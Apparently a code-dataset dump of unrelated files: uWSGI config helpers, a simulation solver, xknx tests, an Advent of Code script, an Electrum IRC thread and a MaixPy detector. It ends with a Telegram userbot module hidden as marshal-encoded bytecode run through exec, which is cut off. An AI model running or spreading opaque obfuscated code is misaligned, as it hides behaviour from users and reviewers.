signal = ModifierSignal
snmp = ModifierSnmp
spooler = ModifierSpooler
ssi = ModifierSsi
subscription = ModifierSubscription
symcall = ModifierSymcall
v8 = ModifierV8
webdav = ModifierWebdav
wsgi = ModifierWsgi
xslt = ModifierXslt
def use_router(self, router, force=None):
"""
:param RouterBase router: Dedicated router object. See `.routers`.
:param bool force: All of the gateways (routers) has to be run under the master process,
supplying this you can try to bypass this limit.
"""
self._set('force-gateway', force, cast=bool)
router._contribute_to_opts(self)
return self._section
def register_route(self, route_rules, label=None):
"""Registers a routing rule.
:param RouteRule|list[RouteRule] route_rules:
:param str label: Label to mark the given set of rules.
This can be used in conjunction with ``do_goto`` rule action.
* http://uwsgi.readthedocs.io/en/latest/InternalRouting.html#goto
"""
route_rules = listify(route_rules)
if route_rules and label:
self._set(route_rules[0].command_label, label, multi=True)
for route_rules in route_rules:
self._set(route_rules.command, route_rules.value, multi=True)
return self._section
def print_routing_rules(self):
"""Print out supported routing rules (actions, transforms, etc.)."""
self._set('routers-list', True, cast=bool)
return self._section
def set_error_page(self, status, html_fpath):
"""Add an error page (html) for managed 403, 404, 500 response.
:param int status: HTTP status code.
:param str html_fpath: HTML page file path.
"""
statuses = [403, 404, 500]
status = int(status)
if status not in statuses:
raise ConfigurationError(
f"Code `{status}` for `routing.set_error_page()` is unsupported. "
f"Supported: {', '.join(map(str, statuses))}")
self._set(f'error-page-{status}', html_fpath, multi=True)
return self._section
def set_error_pages(self, codes_map=None, common_prefix=None):
"""Add an error pages for managed 403, 404, 500 responses.
Shortcut for ``.set_error_page()``.
:param dict codes_map: Status code mapped into an html filepath or
just a filename if common_prefix is used.
If not set, filename containing status code is presumed: 400.html, 500.html, etc.
:param str common_prefix: Common path (prefix) for all files.
"""
statuses = [403, 404, 500]
if common_prefix:
if not codes_map:
codes_map = {code: f'{code}.html' for code in statuses}
for code, filename in codes_map.items():
codes_map[code] = os.path.join(common_prefix, filename)
for code, filepath in codes_map.items():
self.set_error_page(code, filepath)
return self._section
def set_geoip_params(self, db_country=None, db_city=None):
"""Sets GeoIP parameters.
* http://uwsgi.readthedocs.io/en/latest/GeoIP.html
:param str db_country: Country database file path.
:param str db_city: City database file path. Example: ``GeoLiteCity.dat``.
"""
self._set('geoip-country', db_country, plugin='geoip')
self._set('geoip-city', db_city, plugin='geoip')
return self._section
def header_add(self, name, value):
"""Automatically add HTTP headers to response.
:param str name:
:param str value:
"""
self._set('add-header', f'{name}: {value}', multi=True)
return self._section
def header_remove(self, value):
"""Automatically remove specified HTTP header from the response.
:param str value:
"""
self._set('del-header', value, multi=True)
return self._section
def header_collect(self, name, target_var, pull=False):
"""Store the specified response header in a request var
(optionally removing it from the response).
:param str name:
:param str target_var:
:param bool pull: Whether to remove header from response.
"""
self._set(
'pull-header' if pull else 'collect-header',
f'{name} {target_var}',
multi=True
)
return self._section
| 31.735714 | 110 | 0.637332 |
382a21773a33f3d0ef34fe435bc30972d50ff231 | 2,126 | py | Python | implicit_solver/lib/system/solver.py | vincentbonnetcg/Numerical-Bric-a-Brac | e71f2305d7452de985e5e9fa8935da611b6d9992 | [
"MIT"
] | 14 | 2019-05-04T00:42:47.000Z | 2021-09-07T09:57:44.000Z | implicit_solver/lib/system/solver.py | vincentbonnetcg/Numerical-Bric-a-Brac | e71f2305d7452de985e5e9fa8935da611b6d9992 | [
"MIT"
] | null | null | null | implicit_solver/lib/system/solver.py | vincentbonnetcg/Numerical-Bric-a-Brac | e71f2305d7452de985e5e9fa8935da611b6d9992 | [
"MIT"
] | 5 | 2020-12-07T21:44:41.000Z | 2021-09-13T05:29:54.000Z | """
@author: Vincent Bonnet
@description : Solver to orchestrate the step of a solver
"""
import core
from lib.system import Scene
from core import Details
class SolverContext:
'''
SolverContext to store time, time stepping, etc.
'''
def __init__(self, time = 0.0, frame_dt = 1.0/24.0, num_substep = 4, num_frames = 1):
self.time = time # current time (in seconds)
self.start_time = time # start time (in seconds)
self.end_time = time + (num_frames * frame_dt) # end time (in seconds)
self.frame_dt = frame_dt # time step on a single frame (in seconds)
self.num_substep = num_substep # number of substep per frame
self.dt = frame_dt / num_substep # simulation substep (in seconds)
self.num_frames = num_frames # number of simulated frame (doesn't include initial frame)
class Solver:
'''
Solver Implementation
'''
def __init__(self, time_integrator):
self.time_integrator = time_integrator
def initialize(self, scene : Scene, details : Details, context : SolverContext):
'''
Initialize the scene
'''
scene.init_kinematics(details, context)
scene.init_conditions(details)
@core.timeit
def solve_step(self, scene : Scene, details : Details, context : SolverContext):
'''
Solve a single step (pre/step/post)
'''
self._pre_step(scene, details, context)
self._step(scene, details, context)
self._post_step(details, context)
@core.timeit
def _pre_step(self, scene : Scene, details : Details, context : SolverContext):
scene.update_kinematics(details, context)
scene.update_conditions(details) # allocate dynamically new conditions
@core.timeit
def _step(self, scene : Scene, details : Details, context : SolverContext):
self.time_integrator.prepare_system(scene, details, context.dt)
self.time_integrator.assemble_system(details, context.dt)
self.time_integrator.solve_system(details, context.dt)
@core.timeit
def _post_step(self, details, context):
pass
| 34.852459 | 96 | 0.669802 |
afbe35d5e6242dc618515f281dfec9e1090c5d9e | 6,016 | py | Python | test/core_tests/value_reader_test.py | jonppe/xknx | b08a122b0f3c170d91aae6213a60c7038e451c93 | [
"MIT"
] | 1 | 2020-12-27T13:54:34.000Z | 2020-12-27T13:54:34.000Z | test/core_tests/value_reader_test.py | jonppe/xknx | b08a122b0f3c170d91aae6213a60c7038e451c93 | [
"MIT"
] | 1 | 2021-02-17T23:54:32.000Z | 2021-02-17T23:54:32.000Z | test/core_tests/value_reader_test.py | mielune/xknx | 57c248c386f2ae150d983f72a5a8da684097265d | [
"MIT"
] | null | null | null | """Unit test for value reader."""
import asyncio
import unittest
from unittest.mock import patch
from xknx import XKNX
from xknx.core import ValueReader
from xknx.dpt import DPTBinary
from xknx.telegram import GroupAddress, Telegram, TelegramDirection, TelegramType
class TestValueReader(unittest.TestCase):
"""Test class for value reader."""
def setUp(self):
"""Set up test class."""
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
def tearDown(self):
"""Tear down test class."""
self.loop.close()
@patch("xknx.core.ValueReader.timeout")
def test_value_reader_read_success(self, timeout_mock):
"""Test value reader: successfull read."""
xknx = XKNX()
test_group_address = GroupAddress("0/0/0")
response_telegram = Telegram(
group_address=test_group_address,
telegramtype=TelegramType.GROUP_RESPONSE,
direction=TelegramDirection.INCOMING,
payload=DPTBinary(1),
)
value_reader = ValueReader(xknx, test_group_address)
# Create a task for read() (3.5 compatible)
read_task = asyncio.ensure_future(value_reader.read())
# receive the response
self.loop.run_until_complete(value_reader.telegram_received(response_telegram))
# and yield the result
successfull_read = self.loop.run_until_complete(asyncio.gather(read_task))[0]
# GroupValueRead telegram is still in the queue because we are not actually processing it
self.assertEqual(xknx.telegrams.qsize(), 1)
# Callback was removed again
self.assertEqual(xknx.telegram_queue.telegram_received_cbs, [])
# Timeout handle was cancelled (cancelled method requires Python 3.7)
event_has_cancelled = getattr(value_reader.timeout_handle, "cancelled", None)
if callable(event_has_cancelled):
self.assertTrue(value_reader.timeout_handle.cancelled())
# timeout() was never called because there was no timeout
timeout_mock.assert_not_called()
# Telegram was received
self.assertEqual(value_reader.received_telegram, response_telegram)
# Successfull read() returns the telegram
self.assertEqual(successfull_read, response_telegram)
@patch("logging.Logger.warning")
def test_value_reader_read_timeout(self, logger_warning_mock):
"""Test value reader: read timeout."""
xknx = XKNX()
value_reader = ValueReader(xknx, GroupAddress("0/0/0"), timeout_in_seconds=0)
timed_out_read = self.loop.run_until_complete(value_reader.read())
# GroupValueRead telegram is still in the queue because we are not actually processing it
self.assertEqual(xknx.telegrams.qsize(), 1)
# Warning was logged
logger_warning_mock.assert_called_once_with(
"Error: KNX bus did not respond in time (%s secs) to GroupValueRead request for: %s",
0,
GroupAddress("0/0/0"),
)
# Callback was removed again
self.assertEqual(xknx.telegram_queue.telegram_received_cbs, [])
# Timeout handle was cancelled (cancelled method requires Python 3.7)
event_has_cancelled = getattr(value_reader.timeout_handle, "cancelled", None)
if callable(event_has_cancelled):
self.assertTrue(value_reader.timeout_handle.cancelled())
# No telegram was received
self.assertIsNone(value_reader.received_telegram)
# Unsuccessfull read() returns None
self.assertIsNone(timed_out_read)
def test_value_reader_send_group_read(self):
"""Test value reader: send_group_read."""
xknx = XKNX()
value_reader = ValueReader(xknx, GroupAddress("0/0/0"))
self.loop.run_until_complete(value_reader.send_group_read())
self.assertEqual(xknx.telegrams.qsize(), 1)
telegram = xknx.telegrams.get_nowait()
self.assertEqual(
telegram,
Telegram(
group_address=GroupAddress("0/0/0"),
telegramtype=TelegramType.GROUP_READ,
),
)
def test_value_reader_telegram_received(self):
"""Test value reader: telegram_received."""
xknx = XKNX()
test_group_address = GroupAddress("0/0/0")
expected_telegram_1 = Telegram(
group_address=test_group_address,
telegramtype=TelegramType.GROUP_RESPONSE,
direction=TelegramDirection.INCOMING,
payload=DPTBinary(1),
)
expected_telegram_2 = Telegram(
group_address=test_group_address,
telegramtype=TelegramType.GROUP_WRITE,
direction=TelegramDirection.INCOMING,
payload=DPTBinary(1),
)
telegram_wrong_address = Telegram(
group_address=GroupAddress("0/0/1"),
telegramtype=TelegramType.GROUP_RESPONSE,
direction=TelegramDirection.INCOMING,
payload=DPTBinary(1),
)
telegram_wrong_type = Telegram(
group_address=test_group_address,
telegramtype=TelegramType.GROUP_READ,
direction=TelegramDirection.INCOMING,
payload=DPTBinary(1),
)
value_reader = ValueReader(xknx, test_group_address)
def async_telegram_received(test_telegram):
return self.loop.run_until_complete(
value_reader.telegram_received(test_telegram)
)
self.assertFalse(async_telegram_received(telegram_wrong_address))
self.assertFalse(async_telegram_received(telegram_wrong_type))
self.assertIsNone(value_reader.received_telegram)
self.assertTrue(async_telegram_received(expected_telegram_1))
self.assertEqual(value_reader.received_telegram, expected_telegram_1)
self.assertTrue(async_telegram_received(expected_telegram_2))
self.assertEqual(value_reader.received_telegram, expected_telegram_2)
| 40.92517 | 97 | 0.677527 |
2af93665bb776e21644701c6bca41dc9417df9ea | 2,078 | py | Python | 2016/day01/taxicab.py | kmcginn/advent-of-code | 96a8d7d723f6f222d431fd9ede88d0a303d86761 | [
"MIT"
] | null | null | null | 2016/day01/taxicab.py | kmcginn/advent-of-code | 96a8d7d723f6f222d431fd9ede88d0a303d86761 | [
"MIT"
] | null | null | null | 2016/day01/taxicab.py | kmcginn/advent-of-code | 96a8d7d723f6f222d431fd9ede88d0a303d86761 | [
"MIT"
] | null | null | null | def handleTurn(heading, turn):
if heading == 'N':
if turn == 'L':
return 'W'
else:
return 'E'
elif heading == 'S':
if turn == 'L':
return 'E'
else:
return 'W'
elif heading == 'E':
if turn == 'L':
return 'N'
else:
return 'S'
elif heading == 'W':
if turn == 'L':
return 'S'
else:
return 'N'
else:
raise Exception
def updateLocation(heading, x, y, turn, distance):
# update heading
newHeading = handleTurn(heading, turn)
# modify counter
newX = x
newY = y
if newHeading == 'N':
newX = x + distance
elif newHeading == 'S':
newX = x - distance
elif newHeading == 'E':
newY = y + distance
elif newHeading == 'W':
newY = y - distance
else:
raise Exception
return (newHeading, newX, newY)
def processData():
rawData = 'L5, R1, R3, L4, R3, R1, L3, L2, R3, L5, L1, L2, R5, L1, R5, R1, L4, R1, R3, L4, L1, R2, R5, R3, R1, R1, L1, R1, L1, L2, L1, R2, L5, L188, L4, R1, R4, L3, R47, R1, L1, R77, R5, L2, R1, L2, R4, L5, L1, R3, R187, L4, L3, L3, R2, L3, L5, L4, L4, R1, R5, L4, L3, L3, L3, L2, L5, R1, L2, R5, L3, L4, R4, L5, R3, R4, L2, L1, L4, R1, L3, R1, R3, L2, R1, R4, R5, L3, R5, R3, L3, R4, L2, L5, L1, L1, R3, R1, L4, R3, R3, L2, R5, R4, R1, R3, L4, R3, R3, L2, L4, L5, R1, L4, L5, R4, L2, L1, L3, L3, L5, R3, L4, L3, R5, R4, R2, L4, R2, R3, L3, R4, L1, L3, R2, R1, R5, L4, L5, L5, R4, L5, L2, L4, R4, R4, R1, L3, L2, L4, R3'
return rawData.split(', ')
def main():
instructions = processData()
#instructions = ['R5', 'L5', 'R5', 'R3']
heading = 'N'
x = 0
y = 0
for i in instructions:
turn = i[0]
distance = int(i[1:])
result = updateLocation(heading, x, y, turn, distance)
heading = result[0]
x = result[1]
y = result[2]
totalDistance = abs(x) + abs(y)
print(totalDistance)
if __name__ == "__main__":
main()
| 30.558824 | 624 | 0.4923 |
2383a23f7e6bd470a09532a4bca173f6de97fe87 | 6,668 | py | Python | src/ircthread.py | argentumproject/electrum-server-arg | 66a0980b19a9f7dc818f2924948f9534a7dbb632 | [
"MIT"
] | 2 | 2016-12-31T16:28:23.000Z | 2018-05-27T08:08:58.000Z | src/ircthread.py | argentumproject/electrum-server-arg | 66a0980b19a9f7dc818f2924948f9534a7dbb632 | [
"MIT"
] | null | null | null | src/ircthread.py | argentumproject/electrum-server-arg | 66a0980b19a9f7dc818f2924948f9534a7dbb632 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import time
import socket
import ssl
import threading
import Queue
import irc.client
from utils import logger
from utils import Hash
from version import VERSION
out_msg = []
class IrcThread(threading.Thread):
def __init__(self, processor, config):
threading.Thread.__init__(self)
self.processor = processor
self.daemon = True
options = dict(config.items('server'))
self.stratum_tcp_port = options.get('stratum_tcp_port')
self.stratum_tcp_ssl_port = options.get('stratum_tcp_ssl_port')
self.report_stratum_tcp_port = options.get('report_stratum_tcp_port')
self.report_stratum_tcp_ssl_port = options.get('report_stratum_tcp_ssl_port')
self.irc_bind_ip = options.get('irc_bind_ip')
self.host = options.get('host')
self.report_host = options.get('report_host')
self.nick = options.get('irc_nick')
if self.report_stratum_tcp_port:
self.stratum_tcp_port = self.report_stratum_tcp_port
if self.report_stratum_tcp_ssl_port:
self.stratum_tcp_ssl_port = self.report_stratum_tcp_ssl_port
if self.report_host:
self.host = self.report_host
if not self.nick:
self.nick = Hash(self.host)[:5].encode("hex")
self.pruning = True
self.pruning_limit = config.get('leveldb', 'pruning_limit')
self.nick = 'A_' + self.nick
self.password = None
self.who_queue = Queue.Queue()
def getname(self):
s = 'v' + VERSION + ' '
if self.pruning:
s += 'p' + self.pruning_limit + ' '
def add_port(letter, number):
DEFAULT_PORTS = {'t':'50001', 's':'50002'}
if not number: return ''
if DEFAULT_PORTS[letter] == number:
return letter + ' '
else:
return letter + number + ' '
s += add_port('t',self.stratum_tcp_port)
s += add_port('s',self.stratum_tcp_ssl_port)
return s
def start(self, queue):
self.queue = queue
threading.Thread.start(self)
def on_connect(self, connection, event):
connection.join("#electrum-arg")
def on_join(self, connection, event):
m = re.match("(A_.*)!", event.source)
if m:
self.who_queue.put((connection, m.group(1)))
def on_quit(self, connection, event):
m = re.match("(A_.*)!", event.source)
if m:
self.queue.put(('quit', [m.group(1)]))
def on_kick(self, connection, event):
m = re.match("(A_.*)", event.arguments[0])
if m:
self.queue.put(('quit', [m.group(1)]))
def on_disconnect(self, connection, event):
logger.error("irc: disconnected")
raise BaseException("disconnected")
def on_who(self, connection, event):
line = str(event.arguments[6]).split()
try:
ip = socket.gethostbyname(line[1])
except:
# no IPv4 address could be resolved. Could be .onion or IPv6.
ip = line[1]
nick = event.arguments[4]
host = line[1]
ports = line[2:]
self.queue.put(('join', [nick, ip, host, ports]))
def on_name(self, connection, event):
for s in event.arguments[2].split():
if s.startswith("A_"):
self.who_queue.put((connection, s))
def who_thread(self):
while not self.processor.shared.stopped():
try:
connection, s = self.who_queue.get(timeout=1)
except Queue.Empty:
continue
#logger.info("who: "+ s)
connection.who(s)
time.sleep(1)
def run(self):
while self.processor.shared.paused():
time.sleep(1)
self.ircname = self.host + ' ' + self.getname()
# avoid UnicodeDecodeError using LenientDecodingLineBuffer
irc.client.ServerConnection.buffer_class = irc.buffer.LenientDecodingLineBuffer
logger.info("joining IRC")
t = threading.Thread(target=self.who_thread)
t.start()
while not self.processor.shared.stopped():
client = irc.client.Reactor()
try:
#bind_address = (self.irc_bind_ip, 0) if self.irc_bind_ip else None
#ssl_factory = irc.connection.Factory(wrapper=ssl.wrap_socket, bind_address=bind_address)
#c = client.server().connect('irc.freenode.net', 6697, self.nick, self.password, ircname=self.ircname, connect_factory=ssl_factory)
c = client.server().connect('irc.freenode.net', 6667, self.nick, self.password, ircname=self.ircname)
except irc.client.ServerConnectionError:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
c.add_global_handler("welcome", self.on_connect)
c.add_global_handler("join", self.on_join)
c.add_global_handler("quit", self.on_quit)
c.add_global_handler("kick", self.on_kick)
c.add_global_handler("whoreply", self.on_who)
c.add_global_handler("namreply", self.on_name)
c.add_global_handler("disconnect", self.on_disconnect)
c.set_keepalive(60)
self.connection = c
try:
client.process_forever()
except BaseException as e:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
logger.info("quitting IRC")
| 37.251397 | 147 | 0.624325 |
e8c966ffb7bcea053e191563bc58049800ffb94b | 4,577 | py | Python | driver/classify20.py | sipeed/MaixUI | 6c4f473ee70766b827d6ef9350f5fd006d59086c | [
"MIT"
] | 66 | 2020-07-29T16:27:15.000Z | 2022-03-20T13:42:17.000Z | driver/classify20.py | sipeed/MaixUI | 6c4f473ee70766b827d6ef9350f5fd006d59086c | [
"MIT"
] | 3 | 2020-08-10T03:07:57.000Z | 2022-03-19T13:33:50.000Z | driver/classify20.py | sipeed/MaixUI | 6c4f473ee70766b827d6ef9350f5fd006d59086c | [
"MIT"
] | 19 | 2020-08-02T03:04:40.000Z | 2022-02-04T09:52:26.000Z | # This file is part of MaixUI
# Copyright (c) sipeed.com
#
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
try:
from ui_canvas import ui
import camera
except:
from ui_canvas import ui
import camera
import KPU as kpu
# classify20
anchor = (1.889, 2.5245, 2.9465, 3.94056, 3.99987, 5.3658, 5.155437, 6.92275, 6.718375, 9.01025)
classes = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']
class HowMany():
is_load = False
task, things = None, None
def load():
if HowMany.is_load == False:
#print(HowMany.load)
HowMany.task = kpu.load(0x5C0000)
#task = kpu.load("/sd/0x5C0000_20class.kmodel")
kpu.init_yolo2(HowMany.task, 0.5, 0.3, 5, (1.889, 2.5245, 2.9465, 3.94056, 3.99987, 5.3658, 5.155437, 6.92275, 6.718375, 9.01025))
HowMany.is_load = True
def work(img):
HowMany.things = kpu.run_yolo2(HowMany.task, img)
if HowMany.things:
for pos in range(len(HowMany.things)):
i = HowMany.things[pos]
img.draw_rectangle(320 - (i.x() + i.w()), i.y(), i.w(), i.h())
img.draw_string(320 - (i.x() + i.w()), i.y(), '%.2f:%s' % (i.value(), classes[i.classid()]), color=(0, 255, 0))
return img
def free():
#print(HowMany.free)
try:
if HowMany.is_load:
kpu.deinit(HowMany.task)
HowMany.is_load = False
except Exception as e:
print(e) # see py_kpu_deinit error will mp_raise_TypeError
class MaybeIs():
is_load = False
task, things, result = None, None, None
def load():
if MaybeIs.is_load == False:
#print(MaybeIs.load)
MaybeIs.task = kpu.load(0x5C0000)
#task = kpu.load("/sd/0x5C0000_20class.kmodel")
kpu.init_yolo2(MaybeIs.task, 0.5, 0.3, 5, (1.889, 2.5245, 2.9465, 3.94056, 3.99987, 5.3658, 5.155437, 6.92275, 6.718375, 9.01025))
MaybeIs.is_load = True
def work(img):
MaybeIs.things = kpu.run_yolo2(MaybeIs.task, img)
if MaybeIs.things:
value, obj = 0, None
for k in range(len(MaybeIs.things)):
if value < MaybeIs.things[k].value():
value, obj = MaybeIs.things[k].value(), MaybeIs.things[k]
i = MaybeIs.things[k]
MaybeIs.result = classes[i.classid()]
img.draw_rectangle(320 - (i.x() + i.w()), i.y(), i.w(), i.h())
img.draw_string(320 - (i.x() + i.w()), i.y(), '%.2f:%s' % (i.value(), classes[i.classid()]), color=(0, 255, 0))
return img
def free():
#print(MaybeIs.free)
try:
if MaybeIs.is_load:
kpu.deinit(MaybeIs.task)
MaybeIs.is_load = False
except Exception as e:
print(e) # see py_kpu_deinit error will mp_raise_TypeError
if __name__ == "__main__":
ui.height, ui.weight = 480, 320
def test_ai_camera():
@ui.warp_template(ui.blank_draw)
def howmany():
tmp = camera.obj.get_image()
HowMany.work(tmp)
ui.canvas.draw_image(tmp, 0, 0)
ui.display()
@ui.warp_template(ui.blank_draw)
def maybe():
tmp = camera.obj.get_image()
MaybeIs.work(tmp)
ui.canvas.draw_image(tmp, 0, 0)
ui.display()
import time
last = time.ticks_ms()
while True:
try:
HowMany.load()
while True:
try:
print(time.ticks_ms() - last)
last = time.ticks_ms()
howmany()
except Exception as e:
# gc.collect()
print(e)
except KeyboardInterrupt as e:
HowMany.free()
#break
try:
MaybeIs.load()
while True:
try:
print(time.ticks_ms() - last)
last = time.ticks_ms()
maybe()
except Exception as e:
# gc.collect()
print(e)
except KeyboardInterrupt as e:
MaybeIs.free()
#break
test_ai_camera()
| 31.349315 | 205 | 0.506008 |
3b57c731a875e894e52db453e8fbd078d5b68641 | 8,597 | py | Python | userbot/modules/messages.py | oxyda-fox/XBot-Remix | 3d97bea5395b223fc89a8cc6cb699cc624ccc967 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/messages.py | oxyda-fox/XBot-Remix | 3d97bea5395b223fc89a8cc6cb699cc624ccc967 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/messages.py | oxyda-fox/XBot-Remix | 3d97bea5395b223fc89a8cc6cb699cc624ccc967 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | #Encript Marshal By XVenom
#https://github.com/xvenom15
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\xb2\x00\x00\x00d\x00Z\x00d\x01d\x02l\x01m\x02Z\x02\x01\x00d\x01d\x03l\x03m\x04Z\x04\x01\x00d\x01d\x04l\x05m\x06Z\x06m\x07Z\x07m\x08Z\x08\x01\x00d\x01d\x05l\tm\nZ\n\x01\x00e\nd\x06d\x07d\x08\x8d\x02d\td\n\x84\x00\x83\x01Z\x0be\nd\x06d\x0bd\x08\x8d\x02d\x0cd\r\x84\x00\x83\x01Z\x0ce\nd\x06d\x0ed\x08\x8d\x02d\x0fd\x10\x84\x00\x83\x01Z\re\nd\x06d\x11d\x08\x8d\x02d\x12d\x13\x84\x00\x83\x01Z\x0ee\nd\x06d\x14d\x08\x8d\x02d\x15d\x16\x84\x00\x83\x01Z\x0fe\x08\xa0\x10d\x17d\x18i\x01\xa1\x01\x01\x00d\x19S\x00)\x1azC Userbot module for purging unneeded messages(usually spam or ot). \xe9\x00\x00\x00\x00)\x01\xda\x05sleep)\x01\xda\rrpcbaseerrors)\x03\xda\x06BOTLOG\xda\rBOTLOG_CHATID\xda\x08CMD_HELP)\x01\xda\x08registerTz\x08^.purge$)\x02Z\x08outgoingZ\x07patternc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x07\x00\x00\x00\xc3\x00\x00\x00s\x1c\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01g\x00}\x02|\x00j\x01j\x02|\x01|\x00j\x03d\x02\x8d\x02}\x03d\x03}\x04|\x00j\x03d\x01k\tr\x8a|\x032\x00zN3\x00d\x01H\x00W\x00}\x05|\x02\xa0\x04|\x05\xa1\x01\x01\x00|\x04d\x04\x17\x00}\x04|\x02\xa0\x04|\x00j\x03\xa1\x01\x01\x00t\x05|\x02\x83\x01d\x05k\x02r6|\x00j\x01\xa0\x06|\x01|\x02\xa1\x02I\x00d\x01H\x00\x01\x00g\x00}\x02q66\x00n\x14|\x00\xa0\x07d\x06\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00|\x02r\xb6|\x00j\x01\xa0\x06|\x01|\x02\xa1\x02I\x00d\x01H\x00\x01\x00|\x00j\x01\xa0\x08|\x00j\td\x07t\n|\x04\x83\x01\x9b\x00d\x08\x9d\x03\xa1\x02I\x00d\x01H\x00}\x06t\x0br\xfc|\x00j\x01\xa0\x08t\x0cd\tt\n|\x04\x83\x01\x17\x00d\n\x17\x00\xa1\x02I\x00d\x01H\x00\x01\x00t\rd\x0b\x83\x01I\x00d\x01H\x00\x01\x00|\x06\xa0\x0e\xa1\x00I\x00d\x01H\x00\x01\x00d\x01S\x00)\x0czA For .purge command, purge all messages starting from the reply. N)\x01Z\x06min_idr\x01\x00\x00\x00\xe9\x01\x00\x00\x00\xe9d\x00\x00\x00z\x1a`Balas di Pesan Goblokk!!`z1`Berhasil Menghapus Kenangan!` \nSebanyak: u\r\x00\x00\x00 Kenangan\xf0\x9f\x98\xadz\x13Kenangan sebanyak: z\x17 berhasil di bersihkan.\xe9\x02\x00\x00\x00)\x0f\xda\x0eget_input_chat\xda\x06client\xda\riter_messages\xda\x0freply_to_msg_id\xda\x06append\xda\x03lenZ\x0fdelete_messages\xda\x04edit\xda\x0csend_message\xda\x07chat_id\xda\x03strr\x04\x00\x00\x00r\x05\x00\x00\x00r\x02\x00\x00\x00\xda\x06delete)\x07Z\x04purg\xda\x04chatZ\x04msgsZ\x07itermsg\xda\x05count\xda\x03msgZ\x04done\xa9\x00r\x19\x00\x00\x00\xda\x00\xda\nfastpurger\x10\x00\x00\x00s:\x00\x00\x00\x00\x03\x0e\x01\x04\x01\x12\x01\x04\x02\n\x01\x10\x01\n\x01\x08\x01\x0c\x01\x0c\x01\x14\x01\n\x02\x10\x01\x04\x02\x04\x01\x14\x01\x06\x01\x04\x00\x02\x01\x06\xff\x06\xff\n\x04\x04\x01\x06\x01\x02\x01\x0e\xfe\n\x03\x0e\x01r\x1b\x00\x00\x00z\t^.purgemec\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00\xc3\x00\x00\x00s\xcc\x00\x00\x00|\x00j\x00}\x01t\x01|\x01d\x01d\x02\x85\x02\x19\x00\x83\x01}\x02d\x03}\x03|\x00j\x02j\x03|\x00j\x04d\x04d\x05\x8d\x022\x00z23\x00d\x02H\x00W\x00}\x01|\x03|\x02d\x03\x17\x00k\x04rH\x01\x00qb|\x03d\x03\x17\x00}\x03|\x01\xa0\x05\xa1\x00I\x00d\x02H\x00\x01\x00q,6\x00|\x00j\x02\xa0\x06|\x00j\x04d\x06t\x07|\x02\x83\x01\x17\x00d\x07\x17\x00\xa1\x02I\x00d\x02H\x00}\x04t\x08r\xa8|\x00j\x02\xa0\x06t\td\x08t\x07|\x02\x83\x01\x17\x00d\t\x17\x00\xa1\x02I\x00d\x02H\x00\x01\x00t\nd\n\x83\x01I\x00d\x02H\x00\x01\x00d\x03}\x03|\x04\xa0\x05\xa1\x00I\x00d\x02H\x00\x01\x00d\x02S\x00)\x0bz5 For .purgeme, delete x count of your latest message.\xe9\t\x00\x00\x00Nr\x08\x00\x00\x00\xda\x02me)\x01Z\tfrom_userz\x1f`Menghapus Kenangan!` Sebanyak z\x08 Sukses.z\x13Berhasil menghapus z\r 